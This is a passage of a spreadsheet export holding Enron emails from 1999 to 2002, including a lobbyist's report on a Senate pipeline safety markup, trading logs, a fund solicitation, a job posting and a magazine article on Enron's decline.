amendment and it passed without much discussion._x000D_
_x000D_
7)  Breaux amendment on Integrity Inspection Program -- Rejected by voice _x000D_
vote.  This was another written by Enron and El Paso that would have removed _x000D_
the bias of substitute text language toward internal inspections and pressure _x000D_
testing and broadened the range of tools that a pipeline could include in an _x000D_
integrity management plan.  It also would have removed a requirement that any _x000D_
state and local official would have the chance to comment on the plan and _x000D_
receive a response.   The debate was heated over this amendment, with Senator _x000D_
Gorton indicating that he could accept the first part of the amendment _x000D_
(removing the bias toward internal inspection/pressure testing) but not the _x000D_
second, which he felt weakened state and local opportunity to comment on _x000D_
pipleines' integrity plans.   The committee agreed to reject the amendment, _x000D_
but work to fix the second part before Senate floor action._x000D_
_x000D_
Procedurally, it was a strange markup session.  A quorum of the Committee (11 _x000D_
members) needs to be present to vote on final passage of the bill.  A vote on _x000D_
the Senate floor came up as Senator Kerry was explaining his amendment (#3), _x000D_
and as Senators were leaving, Senator McCain very quickly asked that the _x000D_
entire bill be passed on voice vote before a quorum left the room, subject to _x000D_
consideration of amendments when they returned.   The bill was passed before _x000D_
many knew what was happening.  Of course, only about 7 members came back to _x000D_
the room for the rest of the markup, so much of the voting was done without _x000D_
full everyone's participation, or by proxy -- which had serious effects on _x000D_
the outcome of several amendments._x000D_
_x000D_
As you can see from the notes on many of the amendments, there will be an _x000D_
opportunity to fix the legislation before it moves any further.  Several _x000D_
Senators indicated after the markup that they had voted with Senator Gorton _x000D_
on several of the amendments as a courtesy to him, but would not support the _x000D_
bill's movement to the Senate floor without serious changes being made.  One _x000D_
key ally is Senator Trent Lott (R-MS), who supported all industry _x000D_
amendments.  His control of the Senate floor schedule as Senate Majority _x000D_
Leader will be key in driving changes to the legislation.   If satisfactory _x000D_
changes are not made, the bill will move no further._x000D_
_x000D_
There will also be an opportunity to provide comments for Committee Report _x000D_
language that will accompany the final bill that was passed.  The report will _x000D_
give explanations of several of the concerns that were raised, and provide _x000D_
legislative history that will help clarify areas where there is uncertainty _x000D_
about the real effect of some of the provisions._x000D_
_x000D_
We did have several victories.  Many of the amendments that were expected -- _x000D_
worse language from the Administration or Patty Murray legislation -- were _x000D_
not even offered because of the advance work we were able to do with _x000D_
Republican and Democratic Commerce Committee members and staff.   We were _x000D_
able to affect a number of changes to the "Chairman's mark" or substitute _x000D_
amendment before the markup even occured._x000D_
_x000D_
Another interesting note:  Senator Kay Bailey Hutchison was a complete _x000D_
non-factor in the markup.  She is the Subcommittee chair responsible for this _x000D_
issue, yet she did not make an opening statement and she did not vote at all _x000D_
on several key amendments of concern to industry.   _x000D_
_x000D_
We will be working on the "where do we go from here" strategy in the coming _x000D_
weeks, and will report as developments occur.  Thanks again to all who helped _x000D_
out in preparation for the markup in what was an amazing team effort.  The _x000D_
technical support of Dave Johnson, Colleen Raker and Lou Soldano was _x000D_
extremely valuable.  Phil Lowry's and Dave Johnson's availability to do key _x000D_
meetings with Senators and staff was critical in our efforts.   And Dave and _x000D_
I can attest to the fact that Enron was in a leadership role leading up to _x000D_
the markup, guiding the efforts of INGAA and others and directly influencing _x000D_
the direction this legislation will take in the coming weeks and months._x000D_
_x000D_
Jeff Keeler_x000D_
(202) 466-9157</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 04:36:46 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/8/02; HourAhead hour: 7;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/8/02; HourAhead hour: 7;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010807.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 7 / Preferred: 152.25 / Final: 152.22)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/8/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>natsource deal</t>
  </si>
  <si>
    <t>i got a call this morning about this...._x000D_
_x000D_
458802  should be 50 mw _x000D_
_x000D_
call me about this deal when you get in._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 05:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">who is going besides the people on the e-mail?_x000D_
_x000D_
_x000D_
To: val.generes@ac.com, Matthew Lenhart/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, _x000D_
Randy Bhatia/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Rockets_x000D_
_x000D_
We are done.  7 tickets in nosebleed.  Cost is $15 each.  Plan to meet me no _x000D_
later than 7:15 outside the Compaq Center's ticket window._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 00:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Messages</t>
  </si>
  <si>
    <t>If the sales representative from the Jaguar dealership calls please get in _x000D_
touch with me.  Have a good morning!_x000D_
_x000D_
The Boss</t>
  </si>
  <si>
    <t>Thu, 22 Jul 1999 03:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.douglas@enron.com', 'paul.racicot@enron.com', 'william.bradford@enron.com', 'awais.omar@enron.com', 'janine.juggins@enron.com', 'justin.boyd@enron.com', 'mark.dilworth@enron.com', 'kal.shah@enron.com', 'rahil.jafry@enron.com', 'mark.taylor@enron.com', 'arfan.aziz@enron.com', 'paul.goddard@enron.com', 'robert.campbell@enron.com', 'kevin.montagne@enron.com', 'marcello.romano@enron.com', 'bryan.seyfried@enron.com', 'david.forster@enron.com', 'elena.kapralova@enron.com', 'debbie.brackett@enron.com', 'david.port@enron.com', 'david.weekes@enron.com', 'andrew.thomas@enron.com', 'scott.sefton@enron.com', 'david.mally@enron.com'})</t>
  </si>
  <si>
    <t>Most recent Online presentation for information</t>
  </si>
  <si>
    <t>Attached is the most recent online presentation we have which may be of _x000D_
help/interest and does include latest look and feel._x000D_
_x000D_
_x000D_
_x000D_
This was a presentation I gave to Skilling yesterday, he was extremely _x000D_
impressed and asked many questions on the project (it lasted 75 minutes) on _x000D_
all aspects of the project. _x000D_
_x000D_
Louise</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Approval of a Non-Solicitation Provision</t>
  </si>
  <si>
    <t xml:space="preserve">Janet, if you are ok, I'm ok - we usually only sign these type of _x000D_
non-solicitations, stand-stills or non-competes if we are well down the road _x000D_
towards having a reasonable probability to completing a transaction with the _x000D_
counterparty.  Otherwise, it becomes a nightmare to manage all these.  I will _x000D_
leave it to your discretion._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 01/31/2001 _x000D_
03:45 PM ---------------------------_x000D_
From: Stuart Zisman on 01/31/2001 03:06 PM_x000D_
To: Mark E Haedicke/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT, Mark _x000D_
Metts/NA/Enron@Enron_x000D_
cc: Jeffery Ader/HOU/ECT@ECT, Michael R Brown/LON/ECT@ECT, Stephen _x000D_
Plauche/Corp/Enron@Enron _x000D_
Subject: Approval of a Non-Solicitation Provision_x000D_
_x000D_
Pursuant to an Interoffice Memorandum from Jim Derrick to all Enron Attorneys _x000D_
dated October 27, 1999, I am required to seek approval from each of you prior _x000D_
to signing off on a non-solicitation agreement which affects Enron North _x000D_
America Corp.  This non-solicitation agreement is being required by Niagara _x000D_
Mohawk in order to participate in its request for proposal both to outsource _x000D_
the management of its supply portfolio and to provide power to meet its _x000D_
"Standard Offer Service" load requirements for a term ending 12/31/06._x000D_
_x000D_
The proposed non-solicitation language reads as follows:_x000D_
_x000D_
_x000D_
"The Interested Party [this is defined to be Enron North America Corp.] _x000D_
agrees that, without the prior written consent of Niagara Mohawk, the _x000D_
Interested Party will not for a period of  eighteen (18) months from the _x000D_
effective date of this Confidentiality Agreement directly or indirectly _x000D_
solicit for employment any non-union individual who is now employed by _x000D_
Niagara Mohawk, its parent, or any of its affiliates or subsidiaries and who _x000D_
is identified by the Interested Party as a result of its evaluation or _x000D_
otherwise in connection with the Transaction; provided, however, that the _x000D_
Interested Party shall not be prohibited from (i) employing any such _x000D_
individual who contacts the Interested Party on his or her own initiative and _x000D_
without any direct or indirect solicitation by the Interested Party, and (ii) _x000D_
conducting generalized solicitations for employees (which solicitations are _x000D_
not specifically targeted at employees of Niagara Mohawk, its parent, or any _x000D_
of its affiliates or subsidiaries) through the use of media advertisements, _x000D_
professional search firms or otherwise."  _x000D_
_x000D_
Please feel free to contact me at extension 3-7493 if you have any questions _x000D_
or comments on the legal side.  If you have questions about the underlying _x000D_
commercial transaction, please call either Jeff Ader or Michael Brown.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
Stuart_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Rice Students</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/09/2001 _x000D_
11:05 AM ---------------------------_x000D_
_x000D_
_x000D_
Christie Patrick_x000D_
04/09/2001 10:39 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Kenneth Parkhill/NA/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Rice Students  _x000D_
_x000D_
Hi Vince and Ken!_x000D_
_x000D_
Thanks for the opportunity to meet the Rice ALP students--Great group!!!_x000D_
_x000D_
Regarding the meeting with Steve Kean,  this week looks tough, but I'm trying _x000D_
for a few minutes this afternoon to at least say "hello"--if it happens at _x000D_
all, it will be at 3:30 or 5p today.  I'll let you know Immediately when I _x000D_
can confirm.  Then, we can schedule something for next week when the students _x000D_
can have a more thorough discussion with Steve._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
--Christie._x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cmastros@unterberg.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.a.shankman@enron.com'})</t>
  </si>
  <si>
    <t>RE: C.E. Unterberg, Towbin Communications Fund, L.P.</t>
  </si>
  <si>
    <t>Mr. Shankman,_x000D_
_x000D_
Do you have documents for the fund, if so, please complete and return to me_x000D_
and also be advised that contributions (ie. wire/check) must be in by close_x000D_
of business tomorrow, January 4, 2001 to be eligable for the January 2001_x000D_
opening, if not the next opening will be April 1, 2001._x000D_
_x000D_
Please give me a call to discuss further at (212) 389-8027._x000D_
_x000D_
Thank you._x000D_
_x000D_
Christina Mastros_x000D_
Private Banking_x000D_
C.E. Unterberg, Towbin_x000D_
10 East 50th Street, 20th Floor_x000D_
New York, NY  10022_x000D_
(212) 389-8027 - Phone_x000D_
(212) 389-8427 - Fax_x000D_
cmastros@unterberg.com_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeffrey.A.Shankman@enron.com [mailto:Jeffrey.A.Shankman@enron.com]_x000D_
Sent: Wednesday, January 03, 2001 12:43 PM_x000D_
To: cmastros@unterberg.com_x000D_
Subject: RE: C.E. Unterberg, Towbin Communications Fund, L.P._x000D_
_x000D_
_x000D_
_x000D_
Yes, how should I proceed?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mastros, Christina" &lt;cmastros@unterberg.com&gt; on 01/03/2001 11:10:58 AM_x000D_
_x000D_
To:   "'Jeffrey.A.Shankman@enron.com'" &lt;Jeffrey.A.Shankman@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: C.E. Unterberg, Towbin Communications Fund, L.P._x000D_
_x000D_
_x000D_
_x000D_
Just a reminder, back on November 30, 2000 you had expressed an interest in_x000D_
the January 1, 2001 opening.  Please let me know if you are still_x000D_
interested._x000D_
_x000D_
Thank you._x000D_
_x000D_
Christina Mastros_x000D_
Private Banking_x000D_
C.E. Unterberg, Towbin_x000D_
10 East 50th Street, 20th Floor_x000D_
New York, NY  10022_x000D_
(212) 389-8027 - Phone_x000D_
(212) 389-8427 - Fax_x000D_
cmastros@unterberg.com_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeffrey.A.Shankman@enron.com [mailto:Jeffrey.A.Shankman@enron.com]_x000D_
Sent: Thursday, November 30, 2000 10:59 AM_x000D_
To: cmastros@unterberg.com_x000D_
Subject: Re: C.E. Unterberg, Towbin Communications Fund, L.P._x000D_
_x000D_
_x000D_
_x000D_
Thanks for the reminder.  Yes I'd like to be included in your jan 1, 2001_x000D_
contribution.  I will attend to this with the necessary paperwork in mid_x000D_
december._x000D_
Regards,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mastros, Christina" &lt;cmastros@unterberg.com&gt; on 11/30/2000 09:17:44 AM_x000D_
_x000D_
To:   "'jeff.shankman@enron.com'" &lt;jeff.shankman@enron.com&gt;_x000D_
cc:_x000D_
Subject:  C.E. Unterberg, Towbin Communications Fund, L.P._x000D_
_x000D_
_x000D_
jeff.shankman@enron.com_x000D_
_x000D_
Thank you for expressing interest in investing in C.E. Unterberg, Towbin_x000D_
Communications Fund, L.P. (COMM) whose portfolio manager is Amanda_x000D_
Macklowe._x000D_
We have been conducting monthly openings since the fund's inception._x000D_
_x000D_
We will allow monthly contributions into the fund on December 1, 2000 and_x000D_
January 1, 2001.  After that, subscriptions will be quarterly as per the_x000D_
Limited Partnership Agreement._x000D_
_x000D_
To date we have raised $12 million.  Despite the challenging market we have_x000D_
experienced over the past few months, COMM had returned approximately 4.2%_x000D_
through the end of October.  November continues along this trend._x000D_
_x000D_
If you are interested, please respond to this e-mail or you may give me a_x000D_
call at_x000D_
(212) 389-8027._x000D_
_x000D_
We thank you for your attention and wish you a joyous upcoming holiday_x000D_
season._x000D_
_x000D_
----------------------------------------------------------------_x000D_
Pursuant to SEC and NASD requirements, all incoming and outgoing e-mail of_x000D_
C.E. Unterberg, Towbin is subject to review by the Compliance Department._x000D_
_x000D_
Please note that C.E. Unterberg, Towbin does not allow the use of e-mail to_x000D_
request, authorize or  effect the purchase or sale of any security, to send_x000D_
fund transfer instructions, or to effect any other transactions.  Any such_x000D_
request, orders or instructions that you send will not be accepted and will_x000D_
not be processed._x000D_
_x000D_
================================================================_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
Pursuant to SEC and NASD requirements, all incoming and outgoing e-mail of_x000D_
C.E. Unterberg, Towbin is subject to review by the Compliance Department._x000D_
_x000D_
Please note that C.E. Unterberg, Towbin does not allow the use of e-mail to_x000D_
request, authorize or  effect the purchase or sale of any security, to send_x000D_
fund transfer instructions, or to effect any other transactions.  Any such_x000D_
request, orders or instructions that you send will not be accepted and will_x000D_
not be processed._x000D_
_x000D_
================================================================_x000D_
_x000D_
----------------------------------------------------------------_x000D_
Pursuant to SEC and NASD requirements, all incoming and outgoing e-mail of _x000D_
C.E. Unterberg, Towbin is subject to review by the Compliance Department._x000D_
_x000D_
Please note that C.E. Unterberg, Towbin does not allow the use of e-mail to _x000D_
request, authorize or  effect the purchase or sale of any security, to send _x000D_
fund transfer instructions, or to effect any other transactions.  Any such _x000D_
request, orders or instructions that you send will not be accepted and will _x000D_
not be processed._x000D_
_x000D_
================================================================</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 08:24:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Paulette</t>
  </si>
  <si>
    <t>I have no objection._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Walls Jr., Rob  _x000D_
Sent:	Tuesday, May 29, 2001 10:15 AM_x000D_
To:	Derrick Jr., James_x000D_
Subject:	FW: Paulette_x000D_
_x000D_
	Jim -_x000D_
_x000D_
	Do you have any objection to Paulette moving with Elizabeth?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Labanowski, Elizabeth  _x000D_
Sent:	Friday, May 25, 2001 3:42 PM_x000D_
To:	Walls Jr., Rob_x000D_
Subject:	Paulette_x000D_
_x000D_
Don't know if you care about this, but my little group is moving to 50M in a couple of weeks (to your old area, i think).  There is apparently lots of empty space on 50M, so if you want to move Paulette over and let her be near us, that is fine with me._x000D_
_x000D_
Have a great weekend.</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 06:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">TRADER_x000D_
_x000D_
ESSENTIAL FUNCTIONS: Involved in trading of energy, specifically power. _x000D_
Identify and evaluate current power market needs, supply_x000D_
availability, and new market opportunities. Ability to perform shift-work _x000D_
(5:30am-5:30pm or 5:30pm-5:30am). Excellent phone skills. Strong_x000D_
desire to learn trading._x000D_
_x000D_
ESSENTIAL REQUIREMENTS: Advanced Excel spreadsheet skills. Bachlor's degree, _x000D_
preferably in a financial or economic discipline._x000D_
Trading experience is a plus. Knowledge of Risk Management tools. Knowledge _x000D_
of trading products, regional forward price curves, risk_x000D_
management, pricing strategies, power supply, and ransmission/physical assets _x000D_
to execute/facilitate transactions. Knowledge of regions in_x000D_
which power is traded (SERC, ECAR, PJM, MAIN, NY Power Pool)._x000D_
_x000D_
PREFERRED SKILLS: NA._x000D_
_x000D_
SPECIAL CHARACTERISTICS: NA._x000D_
_x000D_
CONTACT: To be considered for this position, please e-mail your RESUME to _x000D_
enajobs5@enron.com. Plain text in the message body or an_x000D_
attached Word.doc are acceptable. No columns, italics or underlines. If _x000D_
unable to e-mail, mail to JPalmer - EB3678I, Enron Corp., 1400_x000D_
Smith Street, Houston, TX 77002. You MUST mention the REQUISITION# in the _x000D_
subject line of your e-mail, or if mailing your resume. NO_x000D_
PHONE CALLS OR PERSONAL VISITS TO RECRUITER OR HIRING MANAGER. All resumes _x000D_
will be kept strictly confidential._x000D_
Enron is an Equal Opportunity and Affirmative Action Employer, and subscribes _x000D_
to a drug-free and smoke-free workplace. </t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Aspen Technologies NDA</t>
  </si>
  <si>
    <t>Please email a two way NDA to Aspen Technologies _x000D_
_x000D_
Wayne Bartel_x000D_
wayne.bartel.petrovantage.com_x000D_
Aspen Technologies_x000D_
10 Canal Park_x000D_
Cambridge, Mass 02141_x000D_
617 949-1116 fax_x000D_
617 949-1412</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 09:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.lees@enron.com', 'frank.davis@enron.com', 'stephanie.sever@enron.com'})</t>
  </si>
  <si>
    <t>ETA Amendment-Talisman Energy Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">We have received the executed Letter Agreement dated August 23, 2000 amending _x000D_
the Electronic Trading Agreement with the referenced counterparty.  Copies _x000D_
will be distributed to Frank Davis and to Peter Keohane for the Enron Canada _x000D_
Talisman file. </t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 13:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Colleen/Chris:  I'm working from memory here, but I'm pretty sure that the _x000D_
new Order 637 reporting requirements require the Index of Customers to list _x000D_
the primary receipt and delivery points.  However, in checking the FERC web _x000D_
site, the pipelines are only required to update the Index of Customers _x000D_
quarterly.  Therefore, the indices filed under the new reporting requirements _x000D_
won't be out until early October.  I will look into this more closely when I _x000D_
get back._x000D_
_x000D_
Chris -- Is your Penn Fuel release on Transco or Tennessee?  I couldn't find _x000D_
"Penn Fuel" on either the Transco or Tennessee Index of Customers as of _x000D_
7/1/00.  Do they have another "legal" name?_x000D_
_x000D_
P.S.  Here in western North Carolina, the high today was about 70 degrees.  _x000D_
It's sure going to be rough coming back to 100.  But I understand y'all will _x000D_
have a cool spell tomorrow.  It's supposed to be way down to 92!!  We'll be _x000D_
warming up to about 72.  _x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Colleen Sullivan                           09/06/2000 08:30 AM_x000D_
	_x000D_
_x000D_
To: Rebecca W Cantrell/HOU/ECT@ECT_x000D_
cc: Chris Germany/HOU/ECT@ECT _x000D_
Subject: Transco capacity issue_x000D_
_x000D_
Becky--please read Chris' e-mail below.  I have not talked with him yet about _x000D_
it (I just got the message), but I'll get with him and then we can discuss _x000D_
this further._x000D_
---------------------- Forwarded by Colleen Sullivan/HOU/ECT on 09/06/2000 _x000D_
08:28 AM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
09/05/2000 12:16 PM_x000D_
To: Colleen Sullivan/HOU/ECT@ECT, Judy Townsend/HOU/ECT@ECT, Dan _x000D_
Junek/HOU/ECT@ECT, Scott Goodell/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Transco capacity issue_x000D_
_x000D_
With the change in segmentation rules on Transco, it has become much more _x000D_
critical to know the primary receipt and delivery points for the capacity we _x000D_
are buying.  Mr. Goodell said that Tennessee's EBB will indicate if the _x000D_
points on the capacity you are buying are secondary or primary.  I would _x000D_
prefer to know the actual primary points on the contract, especially the _x000D_
delivery points._x000D_
_x000D_
I just bought some Z6-Z6 capacity from Penn Fuel for the balance of the _x000D_
month.  Steve Gillespie verified that Penn Fuel released the primary receipt _x000D_
and delivery point on the contract.  But, I'm taking Penn Fuel's word for it _x000D_
and I am unable to verify the information myself.  It could have a big impact _x000D_
on what we flow in Z6._x000D_
_x000D_
Colleen, can we do anything about this through the regulatory process?  Let _x000D_
me know if you need specific capacity examples._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 09:12:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'denver.plachy@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Less than a year ago, the Houston-based energy behemoth had everything: mon=_x000D_
ey, power, glitz, smarts, new ideas, and a CEO who wanted to make it the mo=_x000D_
st important company in the world. Now its stock is down, wall street is be=_x000D_
arish, and the CEO is gone. What went wrong?_x000D_
by Mimi Swartz &lt;/mag/issues/authors/mimiswartz.php&gt;_x000D_
THE ENRON SKYSCRAPER NEAR THE SOUTH END OF HOUSTON'S DOWNTOWN feels like th=_x000D_
e international headquarters of the best and the brightest. The lobby in no=_x000D_
 way resembles the hushed, understated entryways of the old-fashioned oil c=_x000D_
ompanies, like Shell and Texaco nearby. Enron, in contrast, throbs with mod=_x000D_
ernity. The people hustling in and out of the elevators are black, white, b=_x000D_
rown; Asian, Middle Eastern, European, African, as well as American-born. T=_x000D_
hey are young, mostly under 35, and dressed in the aggressively casual unif=_x000D_
orm of the tech industry-the guys wear khakis, polo shirts, and Banana Repu=_x000D_
blic button-downs. Almost preposterously fit, they move through the buildin=_x000D_
g intently, like winners. Enron is nothing if not energetic: A Big Brother-=_x000D_
size TV screen frantically reports on the stock market near a bank of eleva=_x000D_
tors, while another hefty black television relaying the same news greets pe=_x000D_
ople entering from the garage. A sculpture of the corporate symbol, an E ti=_x000D_
pped at a jaunty angle, radiates colors as it spins frenetically on its axi=_x000D_
s; a Starbucks concession on the ground floor keeps everyone properly caffe=_x000D_
inated. Multicolored, inspirational flags hang from the ceiling, congratula=_x000D_
ting Enron on its diversity and its values; one more giant banner between e=_x000D_
levator banks declares Enron's simple if grandiose goal: "From the World's =_x000D_
Leading Energy Company to . . . The World's Leading Company!"_x000D_
For a while, that future seemed guaranteed, as Enron transformed itself fro=_x000D_
m a stodgy, troubled pipeline company in 1985 to a trading colossus in 2000=_x000D_
. It was a Wall Street darling, with a stock price that increased 1,700 per=_x000D_
cent in that sixteen-year period, with revenues that increased from $40 bil=_x000D_
lion to $100 billion. "The very mention of the company in energy circles th=_x000D_
roughout the world creates reactions ranging from paralyzing fear to envy,"=_x000D_
 notes a 2001 report from Global Change Associates, a firm that provides ma=_x000D_
rket intelligence to the energy business._x000D_
This Enron was largely the creation of Jeff Skilling, a visionary determine=_x000D_
d to transform American business. Hired sixteen years ago as a consultant b=_x000D_
y then-CEO Ken Lay, Skilling helped build a company that disdained the old =_x000D_
formula of finding energy in the ground, hauling it in pipelines, and then =_x000D_
selling it to refineries and other customers. Instead, it evolved into a co=_x000D_
mpany that could trade and market energy in all its forms, from natural gas=_x000D_
 to electricity, from wind to water. If you had a risky drilling venture, E=_x000D_
nron would fund it for a piece of the action. If you wanted your megacorpor=_x000D_
ation's energy needs analyzed and streamlined, Enron could do the job. If y=_x000D_
ou were a Third World country with a pitiful infrastructure and burgeoning =_x000D_
power needs, Enron was there to build and build. Basically, if an idea was =_x000D_
new and potentially-and fantastically-lucrative, Enron wanted the first cra=_x000D_
ck. And with each success, Enron became ever more certain of its destiny. T=_x000D_
he company would be the bridge between the old economy and the high-tech wo=_x000D_
rld, and in February of this year, Skilling reaped his reward when he succe=_x000D_
eded Lay as chief executive officer. Enron, says Skilling, "was a great mar=_x000D_
riage of the risk-taking mentality of the oil patch with the risk-taking me=_x000D_
ntality of the financial markets."_x000D_
The Enron story reflects the culture that drove American business at the en=_x000D_
d of the twentieth century. Like the high-tech companies it emulated, Enron=_x000D_
 was going to reinvent the American business model and, in turn, the Americ=_x000D_
an economy. Maybe it was natural that this Brave New World also produced a =_x000D_
culture that was based on absolutes: not just the old versus the new, but t=_x000D_
he best versus the mediocre, the risk takers versus the complacent-those wh=_x000D_
o could see the future versus those who could not. The key was investing in=_x000D_
 the right kind of intellectual capital. With the best and the brightest, a=_x000D_
 company couldn't possibly go wrong._x000D_
Or could it? Today Enron's stock trades at around $35, down from a high of =_x000D_
$80 in January. The press cast Enron as the archvillain of California's ene=_x000D_
rgy crisis last spring, and Skilling caught a blueberry pie in the face for=_x000D_
 his relentless defense of the free market. A long-troubled power plant pro=_x000D_
ject in India threatened the company's global ambitions. Telecommunications=_x000D_
, in which Enron was heavily invested, imploded. Wall Street analysts who o=_x000D_
nce touted the company questioned its accounting practices. Some of the cha=_x000D_
nge in Enron's fortunes can be attributed to the economic downturn in uncer=_x000D_
tain times that has afflicted all of American business. But the culture tha=_x000D_
t the company created and lived by cannot escape blame._x000D_
ENRON, JEFF SKILLING SAYS, HAD "a totally different way of thinking about b=_x000D_
usiness-we got it." At Enron, in fact, you either "got it" or you were gone=_x000D_
-it was as simple as black and white. It is not coincidental, then, that th=_x000D_
e color scheme of Skilling's River Oaks mansion mirrors the corporation he =_x000D_
once headed. Here, the living room's white walls shimmer against the mahoga=_x000D_
ny floors. Black leather trims the edge of snowy carpets. Billowy sofas set=_x000D_
 off the jet-black baby grand. In the entry, white orchids cascade from a b=_x000D_
lack vase on a black pedestal table that in turn pools onto cold, white mar=_x000D_
ble. There is only one off-color note: After almost twenty years, Jeff Skil=_x000D_
ling is no longer associated with Enron, having resigned abruptly after jus=_x000D_
t six months as CEO. Once, Skilling was hailed as the next Jack Welch (Gene=_x000D_
ral Electric's masterful CEO), as one of Worth magazine's best CEO's in Ame=_x000D_
rica (anointed in 2001), and even as a daredevil who hosted the kind of unc=_x000D_
hained adventure junkets in which, a friend told BusinessWeek, "someone cou=_x000D_
ld actually get killed." Today, he sounds more like Ebenezer Scrooge on Chr=_x000D_
istmas morning. "I had no idea what I'd let go of," Skilling says of all th=_x000D_
e personal sacrifices he made while retooling Enron.=20_x000D_
From a black chair in the white library, across from a huge black and white=_x000D_
 photograph of his daughter and two sons, Skilling clarifies. The demands o=_x000D_
f working 24-7 for Enron caused him to ignore his personal finances. Divorc=_x000D_
ed, he lived in a 2,200-square-foot house without a microwave or a dishwash=_x000D_
er. He almost missed his brother's wedding. "Learning a foreign language-I =_x000D_
never learned a foreign language!" he exclaims. He never once took his youn=_x000D_
gest son to school. "I'm interested in the kids. You don't do kids in fifte=_x000D_
en-minute scheduling." Travel: "You can't go to Africa for a week and get a=_x000D_
nything out of it!" Skilling includes the study of architecture and design =_x000D_
on his list of missed opportunities, then he stops and sighs. "I'm not sure=_x000D_
 that fulfillment in life is compatible with a CEO's job," he says, finally=_x000D_
. Then his eyes lock on mine, and his voice, which had softened, regains it=_x000D_
s pragmatic edge. "It would have been easy to stay," he says. "But that wou=_x000D_
ld not have been good for me."=20_x000D_
He's a smallish, ruddy-faced man who keeps himself at fighting weight, hand=_x000D_
some in the way of corporate titans, with piercing cheekbones and that assi=_x000D_
duously stolid gaze. But the impatience Skilling once reserved for cautious=_x000D_
 underlings and dull-witted utility company executives is now targeted at r=_x000D_
eporters who have labeled his resignation "bizarre" and associates who are =_x000D_
bitterly skeptical of his need for family time. His shrug stretches the lim=_x000D_
its of his shimmering blue button-down, and his matching blue eyes look put=_x000D_
 upon. "I'm surprised," he says, "that people have so much trouble understa=_x000D_
nding this."_x000D_
PEOPLE WHO PASSED THROUGH DOWNTOWN HOUSTON in the late eighties or early ni=_x000D_
neties couldn't help but notice a funny and, for its time, novel scene unfo=_x000D_
lding throughout the workday at the base of the Enron Building. From nine t=_x000D_
o five and before and after, you could see people slipping out of the prist=_x000D_
ine silver skyscraper to smoke. They perched on the chrome banisters or lur=_x000D_
ked near the glass doors at the entry, puffing like mad. They always looked=_x000D_
 hurried and furtive, even ashamed. Whatever people knew about Enron in tho=_x000D_
se days (and most people didn't know much), it was often associated with th=_x000D_
at scene: Enron boasted one of the first nonsmoking corporate headquarters =_x000D_
in Houston, and there couldn't have been clearer evidence of its break with=_x000D_
 the energy world of the past. What macho engineer would have put up with s=_x000D_
uch humiliation?_x000D_
